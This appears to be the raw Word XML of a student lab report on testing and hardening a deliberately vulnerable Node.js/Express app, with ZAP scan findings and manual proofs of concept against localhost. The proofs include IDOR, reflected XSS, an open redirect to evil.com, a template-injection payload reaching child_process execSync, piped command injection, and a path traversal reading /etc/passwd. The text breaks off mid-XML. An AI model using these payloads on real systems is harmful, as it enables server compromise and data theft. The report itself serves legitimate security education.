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ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Black" w:hAnsi="Source Sans Pro Black" w:eastAsia="SimSun" w:cs="Source Sans Pro Black"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Spectrum Web App Hardening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580"/>
        <w:gridCol w:w="1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00B0F0"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFF00"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFF00"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Num</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0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  <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2580" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0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  <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1682" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0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  <w:t>Rule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" w:hRule="atLeast"/>
        </w:trPr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  <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc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  <w:t>2305152</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="258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bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ABDELRHMAN ISLAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1682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  <w:t xml:space="preserve">POINT:A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  <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc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  <w:t>2305184</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2580" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun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bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>MOHAMED ADEL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1682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  <w:t xml:space="preserve">POINT:B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</w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="213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  <w:t>2305153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4BACC6"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2580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bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ABDELRHMAN ELSAYED</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1682" w:type="dxa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79646"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">POINT:C </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1774" w:tblpY="350"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="86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5"/>
        <w:gridCol w:w="43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5" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0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  <w:t>INDEX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4397" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0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FFFF00"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>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5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  <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4397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  <w:t>Clone and run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5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  <w:t>1(A)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4397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  <w:t>Dynamic Testing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5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  <w:t>2(B)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4397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  <w:t>Static Analysis with Semgrep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5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938953"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3(C)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4397" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="both"/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color w:val="595959"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Fix &amp; Harden</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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>Step 0 :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:eastAsia="SimSun" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:eastAsia="SimSun" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Clone and run the vulnerable Node.js/Express app locally</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:eastAsia="SimSun" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:eastAsia="SimSun" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2971800" cy="1762125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 4" descr="00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00.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Symbol" w:hAnsi="Segoe UI Symbol" w:eastAsia="SimSun" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3076575" cy="1209675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 3" descr="0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00.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Symbol" w:hAnsi="Segoe UI Symbol" w:eastAsia="SimSun" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3571875" cy="1057275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Picture 2" descr="0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00.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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:eastAsia="SimSun" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>And finally run app locale is done</w:t>
      </w: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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:eastAsia="SimSun" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3619500" cy="2047875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Picture 1" descr="00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00.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Symbol" w:hAnsi="Segoe UI Symbol" w:eastAsia="SimSun" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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>Phase A – Dynamic Testing (DAST) :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="SimSun" w:cs="Segoe UI Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Black" w:hAnsi="Source Sans Pro Black" w:eastAsia="SimSun" w:cs="Source Sans Pro Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Black" w:hAnsi="Source Sans Pro Black" w:eastAsia="SimSun" w:cs="Source Sans Pro Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A1. Automated Scan :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:eastAsia="SimSun" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:eastAsia="SimSun" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:eastAsia="SimSun" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Zap discover:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:eastAsia="SimSun" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG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URLs / Endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p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/index.html</w:t>
      </w:r>
    </w:p>
    <w:p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/auth-forgot-password-basic.html</w:t>
      </w:r>
    </w:p>
    <w:p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/robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p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/sitemap.xml</w:t>
      </w:r>
    </w:p>
    <w:p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/</w:t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0" distR="0">
            <wp:extent cx="5267325" cy="2876550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Picture 6" descr="0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01.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pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP ZAP reported the following potential security issues:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3600450" cy="2019300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="Picture 7" descr="0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01.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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5267325" cy="2962275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="Picture 8" descr="01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01.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67325" cy="2838450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8" name="Picture 9" descr="0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01.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Content Security Policy (CSP) Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>Issue:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSP header is present but missing important directives (no fallback).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>Risk Level:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Medium</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The Content-Security-Policy header is not properly configured. Missing directives such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>frame-ancestors</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>form-action</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> may allow clickjacking or injection attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>OWASP Category:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>A05 – Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Missing Anti-Clickjacking Header</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>Issue:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> X-Frame-Options header not set.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>Risk:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Medium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The application may be embedded in a malicious iframe, enabling clickjacking attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>OWASP Category:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>A05 – Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Missing Security Headers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>Examples:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:t>X-Content-Type-Options header missing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:t>Cookie HttpOnly flag not set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Increases the risk of MIME sniffing and client-side attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>OWASP Category:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>A05 – Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Information Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>Issue:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Server information leaked via headers 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Reveals backend technology stack, which can assist attackers in crafting targeted exploits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>OWASP Category:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>A05 – Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:cs="Segoe UI Black"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:cs="Segoe UI Black"/>
        </w:rPr>
        <w:t>Role of Automated Scan:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11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These findings were later used as hints for manual testing in Phase A2 which resulted in multiple confirmed high-impact vulnerabilities such as XSS IDOR RCE SSRF and others</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:cs="Segoe UI Black"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:cs="Segoe UI Black"/>
        </w:rPr>
        <w:t>A2. Manual Testing &amp; PoCs:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11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The testing was conducted using a web browser and curl commands to manually craft HTTP requests and observe server responses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Sitka Subheading" w:hAnsi="Sitka Subheading" w:cs="Sitka Subheading"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="default" w:ascii="Sitka Subheading" w:hAnsi="Sitka Subheading" w:cs="Sitka Subheading"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>V1 – Insecure Direct Object Reference (IDOR)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/profile?id={id}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>PoC: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http://localhost:5000/profile?id=2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http://localhost:5000/profile?id=3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http://localhost:5000/profile?id=4</w:t>
      </w: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1533525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="Picture 11" descr="v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v2.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1514475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="Picture 2" descr="v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v2.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 xml:space="preserve">The application allows accessing other users’ profiles by changing the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter without authorization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An attacker can view sensitive information of other users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>V2 – Reflected Cross-Site Scripting (XSS)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/profile?id=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>PoC: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http://localhost:5000/profile?id=&lt;script&gt;alert(22)&lt;/script&gt;</w:t>
      </w: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1304925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="Picture 12" descr="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 descr="v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The JavaScript payload is executed in the victim’s browser.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An attacker can execute malicious scripts, steal session data, or perform actions on behalf of the user.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>V3 – Open / Insecure Redirect</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr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/v1/redirect/?url=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>PoC: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http://localhost:5000/v1/redirect/?url=https://evil.com</w:t>
      </w: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2466975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="Picture 13" descr="v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 descr="v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The application redirects users to an arbitrary external URL without validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>This can be abused for phishing and social engineering attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>V4 – Server-Side Template Injection (SSTI)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/?message=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>PoC: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http://localhost:5000/?message={{7*7}}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>http://localhost:5000/?message={{range.constructor("return global.process.mainModule.require('child_process').execSync('id')")()}}</w:t>
      </w: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2428875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="Picture 15" descr="v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 descr="v4.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3162300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="Picture 1" descr="v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 descr="v4.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Template expressions are evaluated on the server.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This vulnerability can lead to full remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>V5 – Remote Code Execution (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>PoC: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curl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>"http://localhost:5000/v1/status/bud%20|ls"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curl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>"http://localhost:5000/v1/status/bud%20|%20id"</w:t>
      </w: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2105025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="Picture 19" descr="v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v5.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67325" cy="419100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="Picture 18" descr="v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 descr="v5.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Arbitrary system commands are executed on the server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:cs="SimSun"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>An attacker can fully compromise the server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>V6 – Path Traversal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/v1/beer-pic/?picture=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>PoC: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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://localhost:5000/v1/beer-pic/?picture=../../../../../../../etc/passwd" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>http://localhost:5000/v1/beer-pic/?picture=../../../../../../../etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
